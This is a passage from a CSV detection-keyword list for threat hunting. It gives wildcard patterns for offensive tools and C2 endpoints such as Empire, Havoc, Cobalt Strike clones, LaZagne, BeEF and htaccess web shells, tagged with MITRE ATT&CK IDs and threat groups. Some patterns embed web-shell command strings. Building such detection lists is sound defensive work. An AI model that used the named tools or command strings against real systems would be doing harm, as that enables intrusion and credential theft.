TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*HTMLSmuggler-main*,offensive_tool_keyword,HTMLSmuggler,HTML Smuggling generator&obfuscator for your Red Team operations,T1564.001 - T1027 - T1566,TA0005,N/A,N/A,Phishing - Defense Evasion,https://github.com/D00Movenok/HTMLSmuggler,1,1,N/A,10,1,97,13,2023-09-13T22:26:51Z,2023-07-02T08:10:59Z -*HTool*,signature_keyword,Antivirus Signature,AV signature for exploitation tools,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,0,hacktool signatures,N/A,N/A,N/A,N/A,N/A,N/A -*HTool/WCE*,signature_keyword,Antivirus Signature,Generic hacktool Engine signature,N/A,N/A,N/A,N/A,Exploitation tools,N/A,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*HTool-Lazagne*,offensive_tool_keyword,LaZagne,The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.,T1552 - T1003 - T1555,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/AlessandroZ/LaZagne,1,1,N/A,10,10,8527,1980,2023-08-12T12:38:22Z,2015-02-16T14:10:02Z -*htrgouvea/nipe*,offensive_tool_keyword,nipe,An engine to make Tor Network your default gateway.,T1560 - T1573 - T1578,TA0005 - TA0007,N/A,N/A,Data Exfiltration,https://github.com/htrgouvea/nipe,1,1,N/A,N/A,10,1692,315,2023-09-22T12:35:29Z,2015-09-07T18:47:10Z -*htshells-master*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*http* | hakrawler -d *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*http*.sslip.io*,greyware_tool_keyword,sslip.io,sslip.io is a DNS server that maps specially-crafted DNS A records to IP addresses e.g. 127-0-0-1.sslip.io maps to 127.0.0.1,T1568.002 - T1048.003,TA0003 - TA0004,N/A,N/A,C2,https://github.com/cunnie/sslip.io,1,1,letigimate tool abused by threat actor to bypass IP blockage and encrypt traffic,6,10,463,63,2023-10-02T11:53:54Z,2015-08-26T18:43:35Z -*http*//127.0.0.1:5001*,greyware_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,0,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*http*//localhost:5001*,greyware_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,0,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*http*/127.0.0.1*:1337*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*http*/charlotte.dll*,offensive_tool_keyword,charlotte,c++ fully undetected shellcode launcher,T1055.012 - T1059.003 - T1027.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/9emin1/charlotte,1,1,N/A,10,10,930,234,2021-06-11T04:44:18Z,2021-05-13T07:32:03Z -*http*/demon.dll,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*http*/demon.exe,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*http*/demos/butcher/index.html*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*http*/john/Test/raw/master/*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*http*/localhost*:1337*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,1,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -*http*/zha0gongz1*,offensive_tool_keyword,cobaltstrike,Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/zha0gongz1/DesertFox,1,1,N/A,10,10,123,26,2023-02-02T07:02:12Z,2021-02-04T09:04:13Z -*http*://*/Terminator.sys,offensive_tool_keyword,SharpTerminator,Terminate AV/EDR Processes using kernel driver,T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001,TA0007 - TA0008 - TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mertdas/SharpTerminator,1,1,N/A,N/A,3,266,53,2023-06-12T00:38:54Z,2023-06-11T06:35:51Z -*http*://127.0.0.1:4433*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*http*://127.0.0.1:5556*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*http*://127.0.0.1:8081*,greyware_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*http*://localhost:4433*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*http*://localhost:5556*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*http*://localhost:8081*,greyware_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*http*:3000/hook.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*http*:3200/manjusaka*,offensive_tool_keyword,cobaltstrike,Chinese clone of cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/manjusaka,1,1,N/A,10,10,664,132,2023-05-09T03:31:53Z,2022-03-18T08:16:04Z -*http*:801/bq1iFEP2*,offensive_tool_keyword,cobaltstrike,Chinese clone of cobaltstrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/YDHCUI/manjusaka,1,1,N/A,10,10,664,132,2023-05-09T03:31:53Z,2022-03-18T08:16:04Z -*http*127.0.0.1:21802*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http*127.0.0.1:3030*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*http*127.0.0.1:5000*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http*127.0.0.1:50050*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*http*127.0.0.1:5096*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http*127.0.0.1:57230*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*http*127.0.0.1:7096*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http*127.0.0.1:8080/*.dll*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http*127.0.0.1:8080/*.exe*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http*127.0.0.1:8080/*.ps1*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http*127.0.0.1:9631*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http*localhost:21802*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http*localhost:3030*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*http*localhost:5000*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http*localhost:50050*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*http*localhost:5096*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http*localhost:57230*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*http*localhost:7096*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http*localhost:9631*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z -*http.title:*BIG-IP®*- Redirect*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/aqhmal/CVE-2020-5902-Scanner,1,0,N/A,N/A,1,54,22,2022-12-08T11:03:15Z,2020-07-05T06:19:09Z -*HTTP/EXEGOL-01.*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*http://*/.htaccess?c=cmd*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,0,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*http://*/.htaccess?c=uname -a*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,0,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*http://*/FortyNorth/GetIt*,offensive_tool_keyword,FunctionalC2,A small POC of using Azure Functions to relay communications,T1021.006 - T1132.002 - T1071.001,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/FortyNorthSecurity/FunctionalC2,1,1,N/A,10,10,58,15,2023-03-30T20:27:38Z,2020-03-12T17:54:50Z -*http://*/FortyNorth/PostIt*,offensive_tool_keyword,FunctionalC2,A small POC of using Azure Functions to relay communications,T1021.006 - T1132.002 - T1071.001,TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/FortyNorthSecurity/FunctionalC2,1,1,N/A,10,10,58,15,2023-03-30T20:27:38Z,2020-03-12T17:54:50Z -*http://*Microsoft.ActiveDirectory.Management.dll*,offensive_tool_keyword,powershell,redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed,T1110.001 - T1110.003 - T1110.004,TA0006,N/A,N/A,Credential Access,https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1,1,1,N/A,N/A,1,91,6,2023-10-01T14:24:00Z,2022-12-05T12:40:02Z -*http://10.10.13.37*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*http://127.0.0.1/CrossC2*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*http://127.0.0.1/FUZZ*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*http://127.0.0.1:3000/ui/panel*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*http://127.0.0.1:35000*,offensive_tool_keyword,evilqr,Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice,T1566.002 - T1204.001 - T1192,TA0001 - TA0005,N/A,N/A,Phishing,https://github.com/kgretzky/evilqr,1,1,N/A,N/A,2,152,21,2023-07-05T13:24:44Z,2023-06-20T12:58:09Z -*http://127.0.0.1:443/aaaaaaaaa*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*http://127.0.0.1:443/bbbbbbbbb*,offensive_tool_keyword,crossc2,generate CobaltStrike's cross-platform payload,T1547.001 - T1055 - T1027 - T1105 - T1047,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*http://127.0.0.1:7444*,offensive_tool_keyword,mythic,A collaborative multi-platform red teaming framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*http://127.0.0.1:7474/browser/*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,neo4j default local url,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*http://127.0.0.1:8000/1.jpg*,offensive_tool_keyword,cobaltstrike,Hou Qing-Advanced AV Evasion Tool For Red Team Ops,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Hangingsword/HouQing,1,0,N/A,10,10,205,59,2021-01-14T08:38:12Z,2021-01-14T07:13:21Z -*http://127.0.0.1:8000/gate.html*,greyware_tool_keyword,golang_c2,C2 written in Go for red teams aka gorfice2k,T1071 - T1021 - T1043 - T1090,TA0011 - TA0008 - 